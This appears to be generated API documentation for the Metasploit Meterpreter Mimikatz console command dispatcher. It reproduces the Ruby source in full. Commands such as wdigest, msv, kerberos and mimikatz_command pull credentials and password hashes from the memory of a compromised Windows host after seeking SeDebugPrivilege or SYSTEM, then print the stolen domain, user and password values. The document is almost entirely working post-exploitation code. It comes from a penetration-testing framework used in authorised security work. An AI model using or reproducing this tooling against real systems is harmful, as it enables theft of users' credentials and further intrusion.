class Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Mimikatz

Mimikatz extension - grabs credentials from windows memory.

Benjamin DELPY `gentilkiwi` blog.gentilkiwi.com/mimikatz

extension converted by Ben Campbell (Meatballs)

Constants

Klass

Public Class Methods

new(shell) click to toggle source

Initializes an instance of the priv command interaction.

# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 26
def initialize(shell)
  super
  if (client.platform =~ /x86/) and (client.sys.config.sysinfo['Architecture'] =~ /x64/)
    print_line
    print_warning "Loaded x86 Mimikatz on an x64 architecture."
  end
end

Public Instance Methods

cmd_kerberos(*args) click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 141
def cmd_kerberos(*args)
  method = Proc.new { client.mimikatz.kerberos }
  mimikatz_request("kerberos", method)
end
cmd_livessp(*args) click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 126
def cmd_livessp(*args)
  method = Proc.new { client.mimikatz.livessp }
  mimikatz_request("livessp", method)
end
cmd_mimikatz_command(*args) click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 55
def cmd_mimikatz_command(*args)
  if (args.length == 0)
    args.unshift("-h")
  end

  cmd_args = nil
  cmd_func = nil
  arguments = []

  @@command_opts.parse(args) { |opt, idx, val|
    case opt
      when "-a"
        cmd_args = val
      when "-f"
        cmd_func = val
      when "-h"
        print(
          "Usage: mimikatz_command -f func -a args\n\n" +
          "Executes a mimikatz command on the remote machine.\n" +
          "e.g. mimikatz_command -f sekurlsa::wdigest -a \"full\"\n" +
          @@command_opts.usage)
        return true
    end
  }

  unless cmd_func
    print_error("You must specify a function with -f")
    return true
  end

  if cmd_args
    arguments = cmd_args.split(" ")
  end

  print_line client.mimikatz.send_custom_command(cmd_func, arguments)
end
cmd_msv(*args) click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 121
def cmd_msv(*args)
  method = Proc.new { client.mimikatz.msv }
  mimikatz_request("msv", method)
end
cmd_ssp(*args) click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 131
def cmd_ssp(*args)
  method = Proc.new { client.mimikatz.ssp }
  mimikatz_request("ssp", method)
end
cmd_tspkg(*args) click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 136
def cmd_tspkg(*args)
  method = Proc.new { client.mimikatz.tspkg }
  mimikatz_request("tspkg", method)
end
cmd_wdigest(*args) click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 116
def cmd_wdigest(*args)
  method = Proc.new { client.mimikatz.wdigest }
  mimikatz_request("wdigest", method)
end
commands() click to toggle source

List of supported commands.

# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 37
def commands
  {
    "mimikatz_command" => "Run a custom command",
    "wdigest" => "Attempt to retrieve wdigest creds",
    "msv" => "Attempt to retrieve msv creds (hashes)",
    "livessp" => "Attempt to retrieve livessp creds",
    "ssp" => "Attempt to retrieve ssp creds",
    "tspkg" => "Attempt to retrieve tspkg creds",
    "kerberos" => "Attempt to retrieve kerberos creds"
  }
end
get_privs() click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 146
def get_privs
  unless system_check
    print_status("Attempting to getprivs")
    privs = client.sys.config.getprivs
    unless privs.include? "SeDebugPrivilege"
      print_warning("Did not get SeDebugPrivilege")
    else
      print_good("Got SeDebugPrivilege")
    end
  else
    print_good("Running as SYSTEM")
  end
end
mimikatz_request(provider, method) click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 92
def mimikatz_request(provider, method)
  get_privs
  print_status("Retrieving #{provider} credentials")
  accounts = method.call

  table = Rex::Ui::Text::Table.new(
    'Header' => "#{provider} credentials",
    'Indent' => 0,
    'SortIndex' => 4,
    'Columns' =>
    [
      'AuthID', 'Package', 'Domain', 'User', 'Password'
    ]
  )

  accounts.each do |acc|
    table << [acc[:authid], acc[:package], acc[:domain], acc[:user], (acc[:password] || "").gsub("\n","")]
  end

  print_line table.to_s

  return true
end
name() click to toggle source

Name for this dispatcher

# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 172
def name
  "Mimikatz"
end
system_check() click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb, line 160
def system_check
  unless (client.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
    print_warning("Not currently running as SYSTEM")
    return false
  end

  return true
end